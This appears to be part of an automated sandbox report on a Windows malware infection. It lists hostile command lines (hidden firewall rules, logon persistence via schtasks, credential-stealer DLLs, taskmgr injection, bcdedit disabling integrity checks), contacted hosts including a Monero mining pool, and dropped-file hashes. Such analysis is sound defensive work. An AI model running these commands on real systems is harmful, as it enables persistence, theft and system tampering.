C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
DE 148.251.234.93:443 yip.su tcp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
RU 5.42.64.10:80 5.42.64.10 tcp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 bolidare.beget.tech udp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 jetpackdelivery.net udp
US 8.8.8.8:53 net.geo.opera.com udp
US 8.8.8.8:53 goboh2b.top udp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 link.storjshare.io udp
US 104.21.93.225:443 flyawayaero.net tcp
US 188.114.97.0:443 jetpackdelivery.net tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 172.67.187.122:443 lycheepanel.info tcp
NL 185.26.182.112:80 net.geo.opera.com tcp
NL 13.227.219.122:443 downloads.digitalpulsedata.com tcp
RU 91.106.207.50:80 bolidare.beget.tech tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 potatogoose.com udp
NL 88.221.25.153:80 apps.identrust.com tcp
NL 88.221.25.153:80 apps.identrust.com tcp
US 172.67.180.173:443 potatogoose.com tcp
RU 45.8.228.16:80 goboh2b.top tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
US 8.8.8.8:53 justsafepay.com udp
US 188.114.96.0:443 justsafepay.com tcp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 136.0.77.2:80 link.storjshare.io tcp
US 8.8.8.8:53 demo.seafile.com udp
DE 168.119.152.22:80 demo.seafile.com tcp
DE 168.119.152.22:443 demo.seafile.com tcp
BG 193.42.32.29:80 193.42.32.29 tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 m7val1dat0r.info udp
US 172.67.222.167:443 m7val1dat0r.info tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 script.google.com udp
DE 172.217.23.206:80 script.google.com tcp
DE 172.217.23.206:443 script.google.com tcp
US 8.8.8.8:53 script.googleusercontent.com udp
NL 142.251.36.1:443 script.googleusercontent.com tcp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 connectini.net udp
GB 91.109.116.11:443 connectini.net tcp
US 8.8.8.8:53 vibrator.s3.pl-waw.scw.cloud udp
PL 151.115.10.1:443 vibrator.s3.pl-waw.scw.cloud tcp
US 8.8.8.8:53 link.storjshare.io udp
US 136.0.77.2:443 link.storjshare.io tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 wewewe.s3.eu-central-1.amazonaws.com udp
DE 52.219.47.233:443 wewewe.s3.eu-central-1.amazonaws.com tcp
US 8.8.8.8:53 360devtracking.com udp
GB 91.109.116.11:80 360devtracking.com tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
JP 23.207.106.113:443 steamcommunity.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 116.203.7.13:80 116.203.7.13 tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
DE 148.251.234.93:443 iplogger.com tcp
US 173.214.169.17:443 tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 9dee3c38-ec60-4163-bc73-927e9b846022.uuid.ramboclub.net udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.stunprotocol.org udp
US 8.8.8.8:53 server2.ramboclub.net udp
US 162.159.133.233:443 cdn.discordapp.com tcp
BG 185.82.216.48:443 server2.ramboclub.net tcp
US 8.8.8.8:53 mastertryprice.com udp
US 172.67.212.103:443 mastertryprice.com tcp
US 8.8.8.8:53 stun3.l.google.com udp
SG 74.125.24.127:19302 stun3.l.google.com udp
BG 193.42.32.29:80 193.42.32.29 tcp
BG 185.82.216.48:443 server2.ramboclub.net tcp

Files

memory/2964-0-0x000000013FB40000-0x000000013FF1E000-memory.dmp

memory/844-5-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

memory/844-6-0x0000000002320000-0x0000000002328000-memory.dmp

memory/844-7-0x000007FEF5C30000-0x000007FEF65CD000-memory.dmp

memory/844-8-0x00000000025D0000-0x0000000002650000-memory.dmp

memory/844-9-0x00000000025D0000-0x0000000002650000-memory.dmp

memory/844-10-0x000007FEF5C30000-0x000007FEF65CD000-memory.dmp

memory/844-11-0x000007FEF5C30000-0x000007FEF65CD000-memory.dmp

memory/2964-14-0x0000000077820000-0x00000000779C9000-memory.dmp

memory/2964-16-0x0000000077820000-0x00000000779C9000-memory.dmp

memory/2108-18-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2108-15-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2964-13-0x000000013FB40000-0x000000013FF1E000-memory.dmp

memory/2108-12-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2108-19-0x0000000074A20000-0x000000007510E000-memory.dmp

memory/2108-20-0x0000000004C90000-0x0000000004CD0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab63B5.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\Tar6406.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 037666f4af75e27ca30ba709a3dd0fee
SHA1 8b6146e4f5d8eaa04882b02f7757e1f2adeb8331
SHA256 60fca329a21ab9bd020d1f4bc65073fbff1bc6d7dbeae9421254bc30223d9465
SHA512 1c105204d44d58c9b950366106db08def8c188507133fcc6654c3a9b74fa151247dc1447012f58421837c67e862f97e0c688fe01643b79fe7d2423fdd11f0726

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 32398b6610af6f9b720f96d1fc423b29
SHA1 6be8b2ef9aaaaa2b8079dcfa2bfe620f14f8d602
SHA256 0071df50fb027512f2ea6ad38b2fb7fa67f5d0ef5bf2aa917951a816b96925d8
SHA512 dd80f678053701558d78ba70dd419bbb6c62d65fd3445878aa5f0937dc96e571068a8a667998740a1910bca3fed090bf94828406b9bbbe2a78c86258c3dd315b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 32398b6610af6f9b720f96d1fc423b29
SHA1 6be8b2ef9aaaaa2b8079dcfa2bfe620f14f8d602
SHA256 0071df50fb027512f2ea6ad38b2fb7fa67f5d0ef5bf2aa917951a816b96925d8
SHA512 dd80f678053701558d78ba70dd419bbb6c62d65fd3445878aa5f0937dc96e571068a8a667998740a1910bca3fed090bf94828406b9bbbe2a78c86258c3dd315b

C:\Users\Admin\Pictures\jgfkLelS1zBc0X92tt2RvHBK.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

\Users\Admin\Pictures\kqOsKmfqWvE20tl2NniiVSyY.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\kqOsKmfqWvE20tl2NniiVSyY.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\kqOsKmfqWvE20tl2NniiVSyY.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\jgfkLelS1zBc0X92tt2RvHBK.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

\Users\Admin\Pictures\jgfkLelS1zBc0X92tt2RvHBK.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

C:\Users\Admin\Pictures\zderJRyjOZCRyK26wvChSu1Z.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

C:\Users\Admin\Pictures\zderJRyjOZCRyK26wvChSu1Z.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

\Users\Admin\Pictures\zderJRyjOZCRyK26wvChSu1Z.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

\Users\Admin\Pictures\jgfkLelS1zBc0X92tt2RvHBK.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

memory/2672-194-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\Pictures\xHTcbLKS6rxUqY0sWeL2q0E5.exe

MD5 e6a512364d1ce64af3cb6228857a93f8
SHA1 a26aeca2a3c1dda8407a9d068925b8031ee3c3ca
SHA256 549d739693616734138fa3cc7695d4c347ae252a43a182229c5b1cf2f834bd7b
SHA512 c66e815102f54a266f67772be6a96bb573f7dd66f6926a7fd8a00af0f935b1bce9a6d9d8454cf57f83e024a5c38b81e139a0e601082255ead840228c5826ad8d

C:\Users\Admin\Pictures\EVNe5bsWxsw7mO3BcLstWKlS.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

memory/672-229-0x0000000000C90000-0x00000000011DD000-memory.dmp

C:\Users\Admin\Pictures\IHD0sFrEigJd85j19SVwcglr.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/2108-227-0x000000000A2E0000-0x000000000A82D000-memory.dmp

C:\Users\Admin\Pictures\EVNe5bsWxsw7mO3BcLstWKlS.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

\Users\Admin\Pictures\IHD0sFrEigJd85j19SVwcglr.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\Pictures\xHTcbLKS6rxUqY0sWeL2q0E5.exe

MD5 e6a512364d1ce64af3cb6228857a93f8
SHA1 a26aeca2a3c1dda8407a9d068925b8031ee3c3ca
SHA256 549d739693616734138fa3cc7695d4c347ae252a43a182229c5b1cf2f834bd7b
SHA512 c66e815102f54a266f67772be6a96bb573f7dd66f6926a7fd8a00af0f935b1bce9a6d9d8454cf57f83e024a5c38b81e139a0e601082255ead840228c5826ad8d

\Users\Admin\Pictures\xHTcbLKS6rxUqY0sWeL2q0E5.exe

MD5 e6a512364d1ce64af3cb6228857a93f8
SHA1 a26aeca2a3c1dda8407a9d068925b8031ee3c3ca
SHA256 549d739693616734138fa3cc7695d4c347ae252a43a182229c5b1cf2f834bd7b
SHA512 c66e815102f54a266f67772be6a96bb573f7dd66f6926a7fd8a00af0f935b1bce9a6d9d8454cf57f83e024a5c38b81e139a0e601082255ead840228c5826ad8d

C:\Users\Admin\Pictures\EVNe5bsWxsw7mO3BcLstWKlS.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

\Users\Admin\Pictures\EVNe5bsWxsw7mO3BcLstWKlS.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

\Users\Admin\Pictures\jxoCZUvoe7kLPGzfIefQktvz.exe

MD5 9110c26b4e982d541e19db0d4dd07ac4
SHA1 712dfa47ee8c828f01efa976de006679df20dde4
SHA256 960fb23ba0b64e081c49e12ea5062d95f15b1d1ccb63e743dac5ead8d2defa58
SHA512 a9f1acc4b5d90d01c45761ccf22945c4cef50c132d59db48b85f03eaebd27939550677333869c89dfbe09236dcb0db0c824fce1a37da4c394a9871155795a378

\Users\Admin\Pictures\jxoCZUvoe7kLPGzfIefQktvz.exe

MD5 9110c26b4e982d541e19db0d4dd07ac4
SHA1 712dfa47ee8c828f01efa976de006679df20dde4
SHA256 960fb23ba0b64e081c49e12ea5062d95f15b1d1ccb63e743dac5ead8d2defa58
SHA512 a9f1acc4b5d90d01c45761ccf22945c4cef50c132d59db48b85f03eaebd27939550677333869c89dfbe09236dcb0db0c824fce1a37da4c394a9871155795a378

C:\Users\Admin\Pictures\jxoCZUvoe7kLPGzfIefQktvz.exe

MD5 9110c26b4e982d541e19db0d4dd07ac4
SHA1 712dfa47ee8c828f01efa976de006679df20dde4
SHA256 960fb23ba0b64e081c49e12ea5062d95f15b1d1ccb63e743dac5ead8d2defa58
SHA512 a9f1acc4b5d90d01c45761ccf22945c4cef50c132d59db48b85f03eaebd27939550677333869c89dfbe09236dcb0db0c824fce1a37da4c394a9871155795a378

memory/1404-236-0x0000000074A20000-0x000000007510E000-memory.dmp

memory/1404-237-0x0000000000BE0000-0x0000000000EFC000-memory.dmp

C:\Users\Admin\Pictures\jxoCZUvoe7kLPGzfIefQktvz.exe

MD5 9110c26b4e982d541e19db0d4dd07ac4
SHA1 712dfa47ee8c828f01efa976de006679df20dde4
SHA256 960fb23ba0b64e081c49e12ea5062d95f15b1d1ccb63e743dac5ead8d2defa58
SHA512 a9f1acc4b5d90d01c45761ccf22945c4cef50c132d59db48b85f03eaebd27939550677333869c89dfbe09236dcb0db0c824fce1a37da4c394a9871155795a378

C:\Users\Admin\Pictures\7cBwhS8gganHMCmqoGHvB0uT.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

\Users\Admin\Pictures\7cBwhS8gganHMCmqoGHvB0uT.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

\Users\Admin\Pictures\FqiLjJ35u9ebEKTgmStbBlVQ.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

\Users\Admin\Pictures\7cBwhS8gganHMCmqoGHvB0uT.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

\Users\Admin\Pictures\FqiLjJ35u9ebEKTgmStbBlVQ.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

memory/2212-256-0x0000000002670000-0x0000000002A68000-memory.dmp

C:\Users\Admin\Pictures\FqiLjJ35u9ebEKTgmStbBlVQ.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

memory/2108-258-0x0000000074A20000-0x000000007510E000-memory.dmp

C:\Users\Admin\Pictures\FqiLjJ35u9ebEKTgmStbBlVQ.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

C:\Users\Admin\Pictures\7cBwhS8gganHMCmqoGHvB0uT.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

\Users\Admin\AppData\Local\Temp\Opera_installer_231005044833828672.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\Pictures\kqOsKmfqWvE20tl2NniiVSyY.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

memory/1408-268-0x00000000FFE30000-0x00000000FFF1C000-memory.dmp

\Users\Admin\Pictures\QW9FvCyP0XXspFSrqJap2zDA.exe

MD5 9fd5293f6df01bd8e9daaf7820589b78
